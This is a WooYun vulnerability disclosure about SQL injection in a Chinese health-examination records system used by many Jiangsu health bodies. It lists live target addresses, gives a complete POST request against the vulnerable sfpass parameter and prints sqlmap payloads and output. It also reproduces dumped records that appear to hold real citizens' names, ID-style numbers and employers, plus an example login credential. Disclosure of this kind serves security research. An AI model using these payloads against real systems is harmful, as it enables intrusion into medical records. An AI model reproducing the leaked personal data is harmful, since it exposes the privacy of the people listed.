当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-085700

漏洞标题:某通用健康体检档案管理系统SQL注入(可影响大量社会公民信息)

相关厂商:中卫信软件

漏洞作者: 小饼仔

提交时间:2014-12-03 12:43

修复时间:2015-03-03 12:44

公开时间:2015-03-03 12:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-03: 细节已通知厂商并且等待厂商处理中
2014-12-08: 厂商已经确认,细节仅向厂商公开
2014-12-11: 细节向第三方安全合作伙伴开放
2015-02-01: 细节向核心白帽子及相关领域专家公开
2015-02-11: 细节向普通白帽子公开
2015-02-21: 细节向实习白帽子公开
2015-03-03: 细节向公众公开

简要描述:

泄露姓名、年龄、公司、身份证号、地址等信息,还可以查体检报告哦~

详细说明:

公司:中卫信软件
地址:http://www.chiscdc.com/
简介:中卫信软件成立以来以“传递科技,控制疾病”为使命,致力于中国公共卫生事业信息化建设,在社会各界的大力支持下,通过全体员工的不懈的努力,在公共卫生行业信息建设方面取得了良好的业绩。公司开发的相关软件产品覆盖江苏省公共卫生领域近70%的市场份额,用户数达1500多家,成为江苏省公共卫生领域信息化建设的领先企业。
联系方式,不让复制就截图了:

111.jpg


存在注入的系统为健康体检系列

222.jpg


查找到的部分案例有:

上海市化工职业病防治院体检查询系统	http://www.shhgzf.com:8280/index.asp
泰州市健康体检查询系统	http://221.230.140.60:8080/index.asp
宿迁市健康体检档案管理系统	http://218.93.201.187:8888/index.asp
镇江市健康体检档案管理系统	http://221.230.8.231:8081/
南通市健康体检档案管理系统	http://222.184.250.2:8001/
吴江市健康体检档案管理系统	http://58.211.131.154:84/
宜兴市体检档案管理系统	http://58.221.214.82:82/
无锡市健康体检档案管理系统	http://58.214.247.138:8088/indextjgr.asp
宜兴职业健康档案管理系统	http://yianjkong.vicp.cc:8081/index.asp
苏州市健康体检档案管理系统	http://www.szcdc.cn/wstjnew/index.asp


影响数据量粗略估计145W +

111.jpg


以 宜兴市体检档案管理系统 http://58.221.214.82:82/为例

111.jpg


登入处存在POST注入,注入参数为sfpass
post请求

POST /grcx/login.asp HTTP/1.1
Host: 58.221.214.82:82
Proxy-Connection: keep-alive
Content-Length: 35
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://58.221.214.82:82
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://58.221.214.82:82/
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: ASPSESSIONIDCQCDQBRS=JFFLHIGDDBNNAIOCIDFFBNMO
RA-Ver: 2.7.1
RA-Sid: 65E7C870-20141014-044958-a23ba1-b78bcc
sfname=1111&sfcode=1111&sfpass=1111


sqlmap

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: sfpass
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: sfname=1111&sfcode=1111&sfpass=-7036' OR 4914=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(113)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (4914=4914) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(99)+CHAR(101)+CHAR(113))) AND 'WdqG'='WdqG
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sfname=1111&sfcode=1111&sfpass=1111'; WAITFOR DELAY '0:0:10'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: sfname=1111&sfcode=1111&sfpass=-2213' OR 9263=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'Xtqw'='Xtqw
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
current database:    'rd_system'
available databases [9]:
[*] KSDemo
[*] lis2002
[*] master
[*] model
[*] msdb
[*] rd_system
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: rd_system
[606 tables]
+--------------------------------+
| CW_INVMTB                      |
| CW_INVSUB                      |
| GBZ188UP                       |
| N_TS_MENU                      |
| N_TS_OPERATELOG                |
| N_TS_PROVERROR                 |
| N_TS_PROVLOG                   |
| NoChargeItm                    |
| TB_APU                         |
| TB_APUCLS                      |
| TB_APUCTG                      |
| TB_APUSTA                      |
| TB_APU_MTNLOG                  |
| TB_ARE                         |
| TB_BASE_DETAIL                 |
| TB_BASE_MASTER                 |
| TB_BHKITMNJCOD                 |
| TB_CHK_ACHIEVE                 |
| TB_CHK_APUCON                  |
| TB_CHK_APUCONSML               |
| TB_CHK_APUCONTRACEHG           |
| TB_CHK_APUCONYZYG              |
| TB_CHK_APUHPLCLCPMS            |
省略···


表dbo.TD_TJ_BHK存放个人信息和体检报告查询用户名和密码
数据举例

99537	321283199402266000	19	205074	男	02 26 1994 12:00AM	朱国龙	07 31 2013  8:06AM	32013007399	NULL	江苏苏中电池科技发展有限公司
99538	320623195709163000	56	554875	男	09 16 1957 12:00AM	张圣宏	07 31 2013  8:07AM	42013000100	NULL	长沙镇长沙医院
99539	320623197807313000	35	31472	男	07 31 1978 12:00AM	季丛泉	07 31 2013  8:07AM	32013007400	NULL	江苏禾本生化有限公司
9954	320623198305178000	27	473852	男	05 17 1983 12:00AM	王雨斌	03 15 2010  8:40AM	32010001054	NULL	江苏苏中电池科技股份有限公司
99540	320623198710319000	26	161671	男	10 31 1987 12:00AM	卜荣荣	07 31 2013  8:08AM	42013000101	NULL	南通科赛尔机械有限公司
99541	320623195509081000	58	556287	男	09  8 1955 12:00AM	袁清	07 31 2013  8:09AM	42013000102	NULL	掘港镇九总医院


字段对应关系:
姓名 编号 密码
EMPNAM BHKCOD PSW
举例:刘泰云 32011002544 547041

漏洞证明:

查询体检报告:

111.jpg


111.jpg

修复方案:

~

版权声明:转载请注明来源 小饼仔@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2014-12-08 12:12

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过公开联系渠道电话和邮件向软件生产厂商——中卫信公司通报。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-12-03 13:32 | 小饼仔 ( 普通白帽子 | Rank:363 漏洞数:41 | 不告诉你)

    @疯狗 这个为啥走小厂商?

  2. 2014-12-09 15:47 | 小饼仔 ( 普通白帽子 | Rank:363 漏洞数:41 | 不告诉你)

    @Finger @xsser @zeracker 求解,这个为什么走小厂商?

  3. 2015-03-03 14:01 | goubuli ( 普通白帽子 | Rank:324 漏洞数:30 )

    @小饼仔 都上首页了,肯定不是小厂商。